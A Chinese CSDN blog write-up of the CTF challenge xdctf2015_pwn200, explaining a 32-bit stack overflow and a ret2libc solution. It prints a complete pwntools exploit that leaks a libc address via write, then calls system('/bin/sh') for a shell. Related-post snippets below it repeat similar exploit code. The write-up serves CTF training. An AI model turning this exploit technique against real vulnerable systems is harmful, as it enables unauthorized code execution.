xdctf2015_pwn200

已于 2023-01-14 02:59:28 修改
阅读量178 收藏
点赞数
分类专栏: pwn刷题 文章标签: 网络安全
于 2023-01-14 02:17:24 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73756460/article/details/128681710
版权

xdctf2015_pwn200

一题标准的ret2libc3套路题

惯例先checksec一下

请添加图片描述

开启了nx保护的32程序 放进ida里看看
请添加图片描述

main函数没啥信息 进vuln函数看看

请添加图片描述

一个非常标准的栈溢出 shift+F12看看字符串表

请添加图片描述

没有找到system和/bin/sh 估计应该是ret2libc3的内容

请添加图片描述

exp:

from pwn import *
from LibcSearcher import *
io=remote('node4.buuoj.cn',25079)
elf=ELF('./bof')

main_addr=elf.sym['main']
write_plt=elf.plt['write']
write_got=elf.got['write']

io.recv()
payload='a'*(0x6c+4)+p32(write_plt)+p32(main_addr)+p32(1)+p32(write_got)+p32(4)
io.sendline(payload)
write_addr=u32(io.recv(4))
print(hex(write_addr))

libc=LibcSearcher('write',write_addr)

libc_base=write_addr-libc.dump('write')
system=libc_base+libc.dump('system')
bin_sh=libc_base+libc.dump('str_bin_sh')
io.recv()
payload='a'*(0x6c+4)+p32(system)+p32(main_addr)+p32(bin_sh)
io.sendline(payload)
io.interactive()
爱若 AI_ruo
关注
专栏目录
CTF--2015中国西安电子科技大学XDCTF网络安全大赛之pwn
关注互联网安全的小虾米一枚
09-19 4526
write up 0x01 基本信息 本人初学,可能本题解答对大神来说,有些繁琐。(大神可以忽略飘过)。 分享在此,方便自己,也方便他人。 文件: xd_jwxt 大小: 8276 字节 修改时间: 2016年7月13日, 16:22:24 MD5: 07BE390A9328A365549A27D400462B59 SHA1: C0175B97E12670373
没有对方libc文件,如何getshell?xdctf12 pwn200 与 welpwn 的 writeup
哒君的博客
07-26 438
DynELF 文档:https://pwntools.readthedocs.io/en/stable/dynelf.html 简单来说,DynELF可以泄漏对方的libc信息 关于DynELF的原理,这个博客讲的很详细
xdctf2015前20名writeup
10-07
2015年xdctf前20名的writeup,绝对不坑
BUUCTF xdctf2015_pwn200
qq_51821131的博客
10-05 1633
xdctf2015_pwn200 检查一下保护 拖进ida看看 存在明显栈溢出,但是没有system和binsh 但是可以通过泄露,找到地址,并拿到shell from pwn import * from LibcSearcher import * p=remote('node4.buuoj.cn',26340) #context.terminal = ['tmux', 'splitw', '-h'] elf=ELF('./bof') read_got=elf.got['read'] write_pl
[BUUCTF]PWN——xdctf2015_pwn200
mcmuyanga的博客
11-11 1171
xdctf2015_pwn200 附件 步骤 例行检查,32位程序,开启了nx保护 本地试运行一下程序,看看大概的情况 32位ida载入,习惯性的检索程序里的字符串,没有发现什么铭感的地方,直接看main函数 vuln函数 参数buf存在溢出漏洞,由于开启了nx,没有可以直接利用的后门,这边使用ret2libc的方法 利用过程: 先用write函数泄露libc版本 payload='a'*(0x6c+4) #溢出到ret payload+=p32(wri
XDCTF2015 PWN200
Bill
03-01 1759
XDCTF 2015 PWN200 一. 源码(自己敲出来的) #include <stdio.h> #include <unistd.h> #include <string.h> int vuln(){ char buf[80]; setbuf(stdin, buf); return read(0, buf, 256)...
xdctf-pwn200-附件资源
03-05
xdctf-pwn200-附件资源
(攻防世界)(XDCTF-2015pwn200
PLpa的博客
07-13 2228
这一题和JarvisOJ中的level4简直不要太像了,只是改变了几个地址,改变了溢出点。 既然前面已经讲解了,这里就不再重复讲了,详细解法请看链接:https://blog.csdn.net/qq_43986365/article/details/95081996 完整exp如下: #! /usr/bin/env python from pwn import * p=remote('111.19...
[BUUCTF-pwn]——xdctf2015_pwn200
Y_peak的博客
03-17 280
[BUUCTF-pwn]——xdctf2015_pwn200 一个简单的ret2libc的题目, 前面写了不少了这里只给exp了 exploit from pwn import * from LibcSearcher import * p = remote('node3.buuoj.cn',27025) elf = ELF('./bof') write_plt = elf.plt['write'] write_got = elf.got['write'] main = elf.symbols['main']
XDCTF-2015 pwn-200 backdoorctf-2015 echo
qq_41071646的博客
05-17 681
XDCTF-2015 pwn-200 简单的泄露基址 这里就不多讲了 #!/usr/bin/python2 # -*- coding:utf-8 -*- from pwn import * context.log_level="debug" #io=remote("111.198.29.45",32529) io=process("./pwn") elf=ELF("./pwn") li...
xdctf-pwn200
Vccxx的博客
04-08 1367
XDCTF (哪一年的忘了)中的一道pwn题题目地址http://pan.baidu.com/s/1hszHtwo解题思路:缓冲区溢出->泄露ebp->覆盖got表->执行shellcode首先用ida分析这题的反汇编:这里是一个关键的缓冲区溢出点,这里虽然v2的长度和读入的最大长度一致,但是我们知道对于printf函数,如果后面的地址中(这里是v2的栈地址)的内容没有”/x00”这样的结束符,就会
XDCTF coding200
blackcat
10-08 727
之前在某项目中实现过了=0=
pwn-200(XDCTF-2015)--write up
ATFWUS的博客
03-03 2813
文件下载地址: 链接:https://pan.baidu.com/s/1W-bn57DPwr0GZlOsAl2enQ 提取码:z3sy 0x01.分析 checksec: 32位程序,只开启NX。 查看源码: 分析源码: 从源码可以得出,主要在read出有栈溢出漏洞。 程序并没有留后门,得靠自己想办法去执行,system('/bin/sh')。 漏洞利用思路: 首...
pwn-200(xctf)
weixin_43868725的博客
08-08 636
0x0 程序保护和流程 保护: 流程: main() overflow() 明显的栈溢出漏洞。 0x1 利用过程 1.由于题目没有给出libc的版本,所以需要通过pwntools中的DynELF或者Libcsearch得出libc的版本。 2.如果使用DynELF则需要向内存写入**/bin/sh**,而Libcsearch则不用。 3.payload的构造(以DynELF为例): payload=padding+p32(read_plt)+p32(ppp_addr)+p32(0)+p32(bss_
【pwn学习】- ret2dlresolve
Morphy_Amo的博客
04-12 3641
ret2dlreslove
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值